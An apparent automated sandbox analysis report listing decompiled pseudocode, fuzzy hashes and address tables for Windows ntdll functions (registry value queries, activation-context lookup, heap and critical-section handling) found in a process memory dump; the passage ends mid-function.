Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: BinaryHash
API String ID: 2994545307-2202222882
Opcode ID: 482b31e6884b06db51d2b7fdd865d73d37874addb9e32dbcbaa81ca049647f0d
Instruction ID: 713c1770693be10ff4949c7efee28636fca54eacc476effed12e13a42c54499f
Opcode Fuzzy Hash: 482b31e6884b06db51d2b7fdd865d73d37874addb9e32dbcbaa81ca049647f0d
Instruction Fuzzy Hash: 4A4109F1D0155C9BEF219A50CC45F9EB77C9B44718F0045A9EA09A7340EB706E88CF99

Uniqueness

Uniqueness Score: -1.00%

Function 046D3884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E046D3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E04699650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L04674620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E04699650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x046d3893
0x046d3896
0x046d3899
0x046d389f
0x046d38a0
0x046d38a4
0x046d38a9
0x046d38ac
0x046d38ad
0x046d38ae
0x046d38af
0x046d38b1
0x046d38b4
0x046d38bb
0x046d38bc
0x046d38bd
0x046d38c4
0x046d38c8
0x046d38ca
0x046d38ca
0x046d38d5
0x046d393e
0x046d3940
0x046d3942
0x046d3952
0x046d3954
0x046d3961
0x046d3961
0x046d3967
0x046d396e
0x046d396e
0x046d3947
0x046d394c
0x00000000
0x046d394c
0x046d38ea
0x046d38ee
0x046d38f8
0x046d38f9
0x046d38ff
0x046d3900
0x046d3902
0x046d3903
0x046d390b
0x046d390f
0x046d3950
0x00000000
0x046d3950
0x046d3915
0x046d391d
0x046d391d
0x046d3922
0x046d3926
0x00000000
0x046d3928
0x046d392b
0x046d392b
0x046d3935
0x046d3937
0x046d3937
0x00000000
0x046d3935
0x046d3926
0x046d38f0
0x00000000

Strings

BinaryName, xrefs: 046D38B4

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: BinaryName
API String ID: 2994545307-215506332
Opcode ID: 52c3bd80e926eaa7716f1e0d036a8e432d651f856c1926b13dcae92734fc0ca4
Instruction ID: f8d77a8b60d906fd0305773f992537885902ff5789ab0df94fe24ac377ace4ef
Opcode Fuzzy Hash: 52c3bd80e926eaa7716f1e0d036a8e432d651f856c1926b13dcae92734fc0ca4
Instruction Fuzzy Hash: F731C272E01519AFEB25DB58C945D7BB774EB40720F014169ED14AB750F630BE44C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 0468D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0468D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x474d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E04674120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0469B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E046998D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E046995D0();
					L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0468d29c
0x0468d2a6
0x0468d2b1
0x0468d2b5
0x0468d2b6
0x0468d2bc
0x0468d2bd
0x0468d2be
0x0468d2bf
0x0468d2c2
0x0468d2c4
0x0468d2cc
0x0468d384
0x0468d34b
0x0468d34f
0x0468d350
0x0468d351
0x0468d35c
0x0468d35c
0x0468d2d6
0x0468d2da
0x0468d2e1
0x0468d361
0x0468d369
0x0468d36d
0x0468d2e3
0x0468d2e3
0x0468d2e3
0x0468d2e5
0x0468d2ed
0x0468d2f5
0x0468d2fa
0x0468d302
0x0468d303
0x0468d30b
0x0468d30f
0x0468d313
0x0468d318
0x0468d31c
0x0468d320
0x0468d379
0x0468d37d
0x00000000
0x00000000
0x046caffe
0x046cb001
0x046cb011
0x00000000
0x0468d322
0x0468d322
0x0468d330
0x0468d337
0x0468d35d
0x0468d339
0x0468d33f
0x0468d38c
0x0468d38c
0x0468d33f
0x0468d349
0x00000000
0x0468d349

Strings

@, xrefs: 0468D303

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: d4f38ebb4f09cf640d088b9b73fd5a037ffe6f9df2c1e3910ee3a56e29b1708b
Instruction ID: 3b0b96e369dba8d6561b8c41d25c488916bb7055c3f9e206888e883a6f9c8bf7
Opcode Fuzzy Hash: d4f38ebb4f09cf640d088b9b73fd5a037ffe6f9df2c1e3910ee3a56e29b1708b
Instruction Fuzzy Hash: F23199B16483059FD721EF18C98096BBBE8EB95754F00062EF59493350F639FD05DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04661B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E04661B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0469BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0469A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0469A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L04674620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x04661b8f
0x04661b9a
0x04661b9c
0x04661b9e
0x04661ba3
0x046b7010
0x046b7010
0x00000000
0x04661ba9
0x04661ba9
0x04661bae
0x00000000
0x04661bc5
0x04661bca
0x04661bcf
0x04661bd0
0x04661bd1
0x04661bd2
0x04661bd6
0x04661bdc
0x04661be0
0x046b6ffc
0x046b7000
0x00000000
0x046b7006
0x046b7009
0x046b7009
0x04661be6
0x04661bec
0x04661c0b
0x04661c0b
0x04661c0c
0x04661c11
0x04661c12
0x04661c15
0x04661c1b
0x04661c1f
0x04661c31
0x04661c33
0x046b7026
0x046b7026
0x04661c21
0x04661c24
0x04661c24
0x04661bee
0x04661bee
0x04661bf2
0x04661c3a
0x04661bf4
0x04661bf4
0x04661c05
0x04661c05
0x04661c09
0x04661c3e
0x00000000
0x00000000
0x00000000
0x04661c09
0x04661bec
0x04661be0
0x04661bae
0x04661c2e

Strings

WindowsExcludedProcs, xrefs: 04661BC5

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 5944ad91f0e8a2557c332d3c4e55aa137468c3fa77ace0bca49c6e8092d1b571
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 1221C8B6601528ABDB219E95C840FDF77ADAF92B55F054426F9059B300F634FD01D7E0

Uniqueness

Uniqueness Score: -1.00%

Function 0467F716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0467F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x0467f71d
0x0467f722
0x0467f726
0x046c4770
0x0467f765
0x0467f769
0x0467f769
0x0467f732
0x046c477a
0x00000000
0x046c477a
0x0467f738
0x0467f73a
0x0467f73c
0x0467f73f
0x0467f746
0x0467f778
0x0467f7a9
0x0467f7a9
0x0467f754
0x0467f75a
0x0467f75d
0x0467f75f
0x0467f761
0x0467f76f
0x0467f771
0x0467f771
0x0467f76f
0x0467f763
0x00000000
0x0467f763
0x0467f77d
0x0467f7a3
0x0467f7a5
0x00000000
0x0467f7a5
0x0467f77f
0x0467f782
0x0467f784
0x0467f786
0x00000000
0x00000000
0x00000000
0x0467f788
0x0467f748
0x0467f74d
0x0467f78d
0x0467f793
0x0467f7b7
0x0467f7bc
0x00000000
0x0467f7bc
0x0467f798
0x00000000
0x00000000
0x0467f79d
0x0467f7b0
0x00000000
0x0467f7b0
0x0467f79f
0x00000000
0x0467f74f
0x0467f74f
0x00000000
0x0467f74f

Strings

Actx , xrefs: 0467F73F

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 26a2935e694524435b1d20b138897c687f25b50cf903db6b56ffd2c2a54a1602
Instruction ID: bc552af6015ce9d8906e85e9c436325ea5ef101ed3fcec0b3e968c5ff99d5080
Opcode Fuzzy Hash: 26a2935e694524435b1d20b138897c687f25b50cf903db6b56ffd2c2a54a1602
Instruction Fuzzy Hash: 3B11B2353086028BEB2C4F1DA891F3672D5EBA5724F24452AE462CB391FB70F8429740

Uniqueness

Uniqueness Score: -1.00%

Function 04708DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E04708DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x4730d50);
				E046AD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E046E5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L046ADEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L046ADEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E046AD130(_t34, _t39, _t40);
			}

0x04708df1
0x04708df1
0x04708df1
0x04708df1
0x04708df1
0x04708df1
0x04708df3
0x04708df8
0x04708dfd
0x04708e00
0x04708e0e
0x04708e2a
0x04708e36
0x04708e38
0x04708e3c
0x04708e46
0x04708e46
0x04708e36
0x04708e50
0x04708e56
0x04708e59
0x04708e5c
0x04708e60
0x04708e67
0x04708e6d
0x04708e73
0x04708e74
0x04708eb1
0x04708ebd

Strings

Critical error detected %lx, xrefs: 04708E21

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: c61a61cbb6b4d1ab19000da84c6f75d609c43de314c78cb9664daf3e4255efed
Instruction ID: 47faf01cefa85dd7b1692c953c5a4a8d67dd814ba4fa4760bbe6c00a7af9f2af
Opcode Fuzzy Hash: c61a61cbb6b4d1ab19000da84c6f75d609c43de314c78cb9664daf3e4255efed
Instruction Fuzzy Hash: BE1145B1D11748DAEB24DFB4990579DBBB1AB04314F24821DD0296B382E2702A01CF19

Uniqueness

Uniqueness Score: -1.00%

Function 046EFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 046EFF60

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: b23add84c4c63d4d1e46e684000503bd7008a67274a302c29ff01353723f4fa9
Instruction ID: c2b5f37d2a4127640ec65a97a732e770a09b049857eba0e382464e2c3bc7c8d1
Opcode Fuzzy Hash: b23add84c4c63d4d1e46e684000503bd7008a67274a302c29ff01353723f4fa9
Instruction Fuzzy Hash: 1B11ED75911544FFEF16EF90C948FA8BBF2FB48708F148458E1086B6A1E739B950CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04725BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E04725BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x4731178);
				E046AD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E04724C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0469D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E04725542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x47460e8;
								if( *0x47460e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x47460e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E04699710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E04696DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0469F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
